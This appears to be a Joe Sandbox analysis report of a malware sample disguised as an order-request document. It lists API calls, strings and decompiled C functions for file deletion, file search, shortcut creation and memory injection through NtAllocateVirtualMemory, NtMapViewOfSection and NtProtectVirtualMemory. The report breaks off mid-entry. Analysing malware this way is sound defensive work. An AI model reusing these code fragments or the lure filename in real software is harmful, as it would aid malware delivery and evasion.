0x0040614b
0x0040614c
0x0040614e
0x0040618a
0x0040618d
0x0040619d
0x004061a0
0x004061a8
0x004061ae
0x004061ae
0x0040620b
0x0040620b
0x0040620d
0x00000000
0x00000000
0x004061b2
0x004061b9
0x004061ba
0x004061bc
0x004061d6
0x004061e4
0x004061ea
0x004061ec
0x00406207
0x00406207
0x00406207
0x00000000
0x00406207
0x004061f2
0x004061fd
0x00406203
0x00406205
0x00000000
0x00000000
0x00000000
0x00406205
0x004061be
0x004061c1
0x00000000
0x00000000
0x004061d0
0x004061d2
0x004061d4
0x00000000
0x00000000
0x00000000
0x004061d4
0x00000000
0x0040620b
0x00406195
0x00000000
0x00406150
0x00406152
0x0040616d
0x00406172
0x00406176
0x00406215
0x00406215
0x00406219
0x00406221
0x00406221
0x00000000
0x00406219
0x00406180
0x0040620f
0x0040620f
0x00406213
0x00000000
0x00000000
0x00000000
0x00406213
0x0040614e
0x00406121
0x00406125
0x00000000
0x00000000
0x00406127
0x0040612b
0x00000000
0x00000000
0x0040612d
0x00406131
0x00000000
0x00406133
0x00406133
0x00000000
0x00406133
0x00406131
0x004062ac
0x004062b7
0x004062c3
0x004062c3
0x00000000

APIs

GetVersion.KERNEL32(00000000,007A0F20,?,004051C8,007A0F20,00000000,00000000,007924F8), ref: 00406117
GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406195
GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004061A8
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061E4
SHGetPathFromIDListW.SHELL32(?,Call), ref: 004061F2
CoTaskMemFree.OLE32(?), ref: 004061FD
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406221
lstrlenW.KERNEL32(Call,00000000,007A0F20,?,004051C8,007A0F20,00000000,00000000,007924F8), ref: 0040627B

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406163
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040621B
Call, xrefs: 0040607E, 0040615E, 0040617F, 00406194, 004061A7, 004061C3, 004061EE, 00406220, 00406226, 00406240, 00406254, 00406274, 0040627A, 00406286, 004062B9

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-1230650788
Opcode ID: 519102f416aae0167fe6a80eec88ce99d0a43be55d541feb02f87bd9ea180c8d
Instruction ID: 54f449c5e60a038f814dd9badb8d8d01ca624a198295cd2e3a2f801cab414967
Opcode Fuzzy Hash: 519102f416aae0167fe6a80eec88ce99d0a43be55d541feb02f87bd9ea180c8d
Instruction Fuzzy Hash: A3610271A00105ABDF20AF68CD40AAE37A4BF51314F12C17FE953BA2D1D67D8AA1CB4D

Uniqueness

Uniqueness Score: -1.00%

Function 00405823 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405823(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405AEE(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x7a8ac8 =  *0x7a8ac8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406032(0x7a3f48, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405A32(_t68);
					} else {
						lstrcatW(0x7a3f48, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x7a3f48,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406032(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E004057DB(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E00405191(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x7a8ac8 =  *0x7a8ac8 + 1;
										} else {
											E00405191(0xfffffff1, _t68);
											E00405ED3(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405823(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x7a3f48 - 0x5c;
					if( *0x7a3f48 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00406375(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E004059E6(_t68);
							_t38 = E004057DB(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E00405191(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E00405191(0xfffffff1, _t68);
							return E00405ED3(_t67, _t68, 0);
						}
						L30:
						 *0x7a8ac8 =  *0x7a8ac8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x0040582d
0x00405832
0x0040583b
0x0040583e
0x00405846
0x00405849
0x0040584c
0x00405854
0x00405856
0x00405857
0x00000000
0x00405857
0x00405862
0x00405865
0x00405865
0x00405865
0x00405869
0x0040587c
0x00405883
0x00405888
0x0040588c
0x0040589c
0x0040588e
0x00405894
0x00405894
0x004058a1
0x004058a5
0x004058b1
0x004058b7
0x004058bc
0x004058c2
0x004058cd
0x004058d3
0x004058d5
0x004058d8
0x00405982
0x00405982
0x00405986
0x00405988
0x00405988
0x00405988
0x00405988
0x00000000
0x00000000
0x00000000
0x00000000
0x004058de
0x004058de
0x004058de
0x004058e6
0x00405906
0x0040590e
0x00405913
0x0040591a
0x00405935
0x0040593a
0x0040593c
0x00405960
0x0040593e
0x0040593e
0x00405941
0x00405955
0x00405943
0x00405946
0x0040594e
0x0040594e
0x00405941
0x0040591c
0x00405922
0x00405924
0x0040592a
0x0040592a
0x00405924
0x00000000
0x0040591a
0x004058e8
0x004058f0
0x00000000
0x00000000
0x004058f2
0x004058fa
0x00000000
0x00000000
0x004058fc
0x00405904
0x00000000
0x00000000
0x00000000
0x00405965
0x0040596d
0x00405973
0x00405973
0x0040597c
0x00000000
0x0040597c
0x004058a7
0x004058af
0x00000000
0x00000000
0x00000000
0x0040586b
0x0040586b
0x0040586d
0x0040598d
0x0040598f
0x00405992
0x004059e3
0x004059e3
0x004059e3
0x00405994
0x00405997
0x004059a2
0x004059a7
0x004059a9
0x00000000
0x00000000
0x004059ac
0x004059b8
0x004059bd
0x004059bf
0x00000000
0x004059da
0x004059c1
0x004059c4
0x00000000
0x00000000
0x004059c9
0x00000000
0x004059d0
0x00405999
0x00405999
0x00000000
0x00405999
0x00405873
0x00405876
0x00000000
0x00000000
0x00000000
0x00405876

APIs

DeleteFileW.KERNELBASE(?,?,762E3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 0040584C
lstrcatW.KERNEL32(007A3F48,\*.*), ref: 00405894
lstrcatW.KERNEL32(?,0040A014), ref: 004058B7
lstrlenW.KERNEL32(?,?,0040A014,?,007A3F48,?,?,762E3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 004058BD
FindFirstFileW.KERNEL32(007A3F48,?,?,?,0040A014,?,007A3F48,?,?,762E3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 004058CD
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 0040596D
FindClose.KERNEL32(00000000), ref: 0040597C

Strings

H?z, xrefs: 0040587C
\*.*, xrefs: 0040588E
"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", xrefs: 0040582C
C:\Users\user\AppData\Local\Temp\, xrefs: 00405830

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"$C:\Users\user\AppData\Local\Temp\$H?z$\*.*
API String ID: 2035342205-3273245650
Opcode ID: b12d6577bcbfee63c8f1005f00baa83bc0992cbcdb087d25710020cb5acef1ed
Instruction ID: 14cb3427b362c018eba3739e9bf11da3c0c9d0e64928a5d047ed163a808d7245
Opcode Fuzzy Hash: b12d6577bcbfee63c8f1005f00baa83bc0992cbcdb087d25710020cb5acef1ed
Instruction Fuzzy Hash: 5441C271800A14FACB21AB658C89BAF7778EF42724F24817BF801B11D1D77C4995DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 00406375 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406375(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x7a4f90); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x7a4f90;
			}

0x00406380
0x00406389
0x00000000
0x00406396
0x0040638c
0x00000000

APIs

FindFirstFileW.KERNELBASE(?,007A4F90,C:\Users\user\AppData\Local\Temp\nspD224.tmp,00405B37,C:\Users\user\AppData\Local\Temp\nspD224.tmp,C:\Users\user\AppData\Local\Temp\nspD224.tmp,00000000,C:\Users\user\AppData\Local\Temp\nspD224.tmp,C:\Users\user\AppData\Local\Temp\nspD224.tmp, 4.v,?,C:\Users\user\AppData\Local\Temp\,00405843,?,762E3420,C:\Users\user\AppData\Local\Temp\), ref: 00406380
FindClose.KERNEL32(00000000), ref: 0040638C

Strings

C:\Users\user\AppData\Local\Temp\nspD224.tmp, xrefs: 00406375

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nspD224.tmp
API String ID: 2295610775-89864070
Opcode ID: 8868b6a2426bb8f5e231bf1a7a7d8febf10f258da88ac185063839d851748521
Instruction ID: 3fb5690f441cb67cce8948cff85e4bd0b52f5f4d7afbd4cfaa78c2f4b78b622c
Opcode Fuzzy Hash: 8868b6a2426bb8f5e231bf1a7a7d8febf10f258da88ac185063839d851748521
Instruction Fuzzy Hash: BAD013715151205FC2505F746E0C44777545F463313154F35F45AF11E0C7745C5645EC

Uniqueness

Uniqueness Score: -1.00%

Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00402095() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x34)) = E00402BBF(0xfffffff0);
				 *((intOrPtr*)(_t107 - 8)) = E00402BBF(0xffffffdf);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402BBF(2);
				 *((intOrPtr*)(_t107 - 0x3c)) = E00402BBF(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0x10)) = E00402BBF(0x45);
				_t52 =  *(_t107 - 0x1c);
				 *(_t107 - 0x40) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x38) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405A5D( *((intOrPtr*)(_t107 - 8))) == 0) {
					E00402BBF(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x40849c, _t83, 1, 0x40848c, _t56); // executed
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084ac, _t107 - 0x48);
					 *((intOrPtr*)(_t107 - 0x14)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x14)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 8)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis\\Grusendes\\Stoser\\Unappealingness\\Dermobranchiate");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x38));
						_t91 =  *((intOrPtr*)(_t107 - 0x3c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x40));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 0xc)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0x10)));
						if( *((intOrPtr*)(_t107 - 0x14)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x48));
							 *((intOrPtr*)(_t107 - 0x14)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x34)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x48));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x14)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x0040209e
0x004020a8
0x004020b2
0x004020bc
0x004020c7
0x004020ca
0x004020e4
0x004020e7
0x004020ed
0x004020f0
0x004020fa
0x004020fe
0x004020fe
0x00402103
0x00402114
0x0040211c
0x004021d3
0x004021d3
0x004021da
0x00402122
0x00402122
0x00402131
0x00402135
0x00402138
0x0040213e
0x0040214c
0x0040214f
0x00402151
0x0040215c
0x0040215c
0x00402161
0x00402163
0x0040216a
0x0040216a
0x0040216d
0x00402176
0x00402179
0x0040217f
0x00402181
0x0040218b
0x0040218b
0x0040218e
0x00402197
0x0040219a
0x004021a3
0x004021a9
0x004021ab
0x004021b9
0x004021b9
0x004021bc
0x004021c2
0x004021c2
0x004021c5
0x004021cb
0x004021d1
0x004021e6
0x00000000
0x00000000
0x00000000
0x004021d1
0x004021dc
0x00402a4f
0x00402a5b

APIs

CoCreateInstance.OLE32(0040849C,?,00000001,0040848C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate, xrefs: 00402154

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate
API String ID: 542301482-2207273832
Opcode ID: a02c29aecddc9ed142f4502ba50d2b7bf96e4c42ae4d7c546ad33a93e5c34623
Instruction ID: d47fca260cdd8e4185df19bb7459501af9c1372a1639466ce8116fcd6c853d94
Opcode Fuzzy Hash: a02c29aecddc9ed142f4502ba50d2b7bf96e4c42ae4d7c546ad33a93e5c34623
Instruction Fuzzy Hash: 2D414C71A00209AFCF00DFA4CD88AAD7BB5FF48314B20456AF515EB2D1DBB99A41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 02FAE63C Relevance: 1.7, APIs: 1, Instructions: 184memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 02FAE82E

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 43ce33b0c3b5578a758be4be8184d043abdd3c5f79e531c91d884d103fdb47c6
Instruction ID: fe9c1ec5c99fde462493550942aec94a9aab9d4332903b35b8bb8cf960388ba1
Opcode Fuzzy Hash: 43ce33b0c3b5578a758be4be8184d043abdd3c5f79e531c91d884d103fdb47c6
Instruction Fuzzy Hash: A55148B6A003898FDB709E24CC657DE37B6EFA9390F81402DDD899B214D7318A86CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02FA8675 Relevance: 1.6, Strings: 1, Instructions: 346COMMON

Download Yara Rule

Strings

wK, xrefs: 02FA876E

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID: wK
API String ID: 0-900654275
Opcode ID: 90073aab2816698a974a2c7bfa508d6dbc268b20e185a7fb352cb1f9d5537c18
Instruction ID: 1f0b17320c66b6eb7c85e9275c8e0ac9fe843943e01a9544e82a13d046620fbf
Opcode Fuzzy Hash: 90073aab2816698a974a2c7bfa508d6dbc268b20e185a7fb352cb1f9d5537c18
Instruction Fuzzy Hash: 5CD112B5A0435A8FDF349E288DA43DA37B6EF56790F55403ECC89DB605C7318A86CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02FAD211 Relevance: 1.6, APIs: 1, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,31B9E346,-5DA34677), ref: 02FAD34F

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3f030419ae650518e439fec93251c2e63ce7cdbdfa3dd531d5eb69f7dc8495b2
Instruction ID: b28481ae60fedf2cf9196fcdbac8fd0e6b65776b2b755d8ef4f614c35eeff281
Opcode Fuzzy Hash: 3f030419ae650518e439fec93251c2e63ce7cdbdfa3dd531d5eb69f7dc8495b2
Instruction Fuzzy Hash: C02101351043069FCB649EB9C9D9BEBB6B2EF94380F46492E8DC997140C3704A82CB02

Uniqueness

Uniqueness Score: -1.00%

Function 02FB0A49 Relevance: 1.5, APIs: 1, Instructions: 42nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(00000001,02FB0F99,9376E882,00000000,?,?,?,?,02FADA45,02FA2559), ref: 02FB0B3A

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: beee6ed6b344b62c1f3933379fac16547e79e4cf08085ac47b6ad9ed961c2066
Instruction ID: b54571096dc81bd903e5f1088ece5e18ebacfff8990bae8243462bc330626587
Opcode Fuzzy Hash: beee6ed6b344b62c1f3933379fac16547e79e4cf08085ac47b6ad9ed961c2066
Instruction Fuzzy Hash: 5B016232704205CEDF2A9E36CDC47DE77A1EF99388F11C52DCA06CA614EF309941C600

Uniqueness

Uniqueness Score: -1.00%

Function 02FAFC1A Relevance: 1.5, APIs: 1, Instructions: 37nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 02FAFCC4

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 36989c77279b85197fb8c0466499f75e9b0f6a1dcdb18dd7e9bd93ff6a896f9b
Instruction ID: 96aa6764bcd1314f19efea07e180b2930e8dfb144cbf9a839f8bcfdc3abbc510
Opcode Fuzzy Hash: 36989c77279b85197fb8c0466499f75e9b0f6a1dcdb18dd7e9bd93ff6a896f9b
